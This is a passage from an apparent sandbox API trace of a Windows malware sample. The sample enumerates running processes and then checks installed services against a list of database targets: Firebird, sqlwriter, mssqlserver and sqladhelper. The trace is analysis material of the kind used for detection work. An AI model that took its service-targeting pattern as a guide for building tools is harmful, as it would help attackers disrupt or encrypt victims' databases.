lstrlenW (lpString="sihost.exe") returned 10 [0190.662] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.662] lstrlenW (lpString="svchost.exe") returned 11 [0190.662] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.663] lstrlenW (lpString="taskhostw.exe") returned 13 [0190.663] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.664] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0190.664] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0190.665] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0190.665] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.666] lstrlenW (lpString="explorer.exe") returned 12 [0190.666] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0190.667] lstrlenW (lpString="Memory Compression") returned 18 [0190.667] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.668] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0190.668] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.669] lstrlenW (lpString="SearchUI.exe") returned 12 [0190.669] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.670] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0190.670] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.670] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0190.670] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0190.671] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0190.671] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0190.672] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0190.672] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0190.673] lstrlenW (lpString="conhost.exe") returned 11 [0190.673] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0190.673] lstrlenW (lpString="roof competitive.exe") returned 20 [0190.673] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0190.674] lstrlenW (lpString="trustees.exe") returned 12 [0190.674] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0190.675] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0190.675] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0190.675] lstrlenW (lpString="isbn.exe") returned 8 [0190.675] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0190.676] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0190.676] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0190.677] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0190.677] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0190.678] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0190.678] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0190.678] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0190.678] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0190.679] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0190.679] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0190.680] lstrlenW (lpString="playstation iraq.exe") returned 20 [0190.680] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0190.680] lstrlenW (lpString="harbor.exe") returned 10 [0190.680] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0190.681] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0190.681] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0190.682] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0190.682] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0190.682] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0190.682] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0190.683] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0190.683] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0190.684] lstrlenW (lpString="larent.exe") returned 10 [0190.684] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0190.685] lstrlenW (lpString="stereo.exe") returned 10 [0190.685] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0190.686] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0190.686] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0190.687] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0190.687] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0190.687] lstrlenW (lpString="state.exe") returned 9 [0190.688] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0190.688] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0190.688] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.689] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0190.689] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.690] lstrlenW (lpString="taskhostw.exe") returned 13 [0190.690] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0190.690] lstrlenW (lpString="sppsvc.exe") returned 10 [0190.690] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.692] lstrlenW (lpString="svchost.exe") returned 11 [0190.692] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0190.692] lstrlenW (lpString="Pg.exe") returned 6 [0190.692] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0190.693] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0190.693] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0190.694] lstrlenW (lpString="conhost.exe") returned 11 [0190.694] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0190.695] lstrlenW (lpString="cmd.exe") returned 7 [0190.695] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0190.917] CloseHandle (hObject=0x370) returned 1 [0190.917] Sleep (dwMilliseconds=0x1f4) [0191.905] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bbe8 [0191.905] EnumServicesStatusExW (in: hSCManager=0x236bbe8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0191.905] GetLastError () returned 0xea [0191.905] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x236df78 [0191.905] EnumServicesStatusExW (in: hSCManager=0x236bbe8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x236df78, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x236df78, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0191.906] CloseServiceHandle (hSCObject=0x236bbe8) returned 1 [0191.906] lstrlenW (lpString="Appinfo") returned 7 [0191.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0191.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0191.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0191.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0191.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0191.907] lstrlenW (lpString="AppXSvc") returned 7 [0191.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0191.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0191.907] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0191.907] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0191.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0191.907] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0191.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0191.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0191.907] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0191.907] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0191.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0191.907] lstrlenW (lpString="Audiosrv") returned 8 [0191.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0191.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0191.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0191.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0191.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0191.907] lstrlenW (lpString="BFE") returned 3 [0191.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0191.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0191.907] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0191.907] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0191.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0191.907] lstrlenW (lpString="BITS") returned 4 [0191.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0191.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0191.907] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0191.907] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0191.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0191.907] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0191.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0191.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0191.908] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0191.908] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0191.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0191.908] lstrlenW (lpString="CDPSvc") returned 6 [0191.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0191.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0191.908] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0191.908] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0191.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0191.908] lstrlenW (lpString="ClickToRunSvc") returned 13 [0191.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0191.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0191.908] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0191.908] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0191.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0191.908] lstrlenW (lpString="ClipSVC") returned 7 [0191.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0191.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0191.908] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0191.908] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0191.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0191.908] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0191.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0191.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0191.908] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0191.908] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0191.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0191.908] lstrlenW (lpString="CryptSvc") returned 8 [0191.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0191.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0191.908] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0191.909] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0191.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0191.909] lstrlenW (lpString="DcomLaunch") returned 10 [0191.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0191.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0191.909] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0191.909] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0191.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0191.909] lstrlenW (lpString="DeviceAssociationService") returned 24 [0191.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0191.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0191.909] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0191.909] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0191.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0191.909] lstrlenW (lpString="Dhcp") returned 4 [0191.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0191.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0191.909] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0191.909] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0191.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0191.909] lstrlenW (lpString="Dnscache") returned 8 [0191.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0191.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0191.909] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0191.909] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0191.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0191.909] lstrlenW (lpString="DoSvc") returned 5 [0191.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0191.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0191.909] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0191.909] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0191.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0191.909] lstrlenW (lpString="DPS") returned 3 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0191.910] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0191.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0191.910] lstrlenW (lpString="DusmSvc") returned 7 [0191.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0191.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0191.910] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0191.910] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0191.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0191.910] 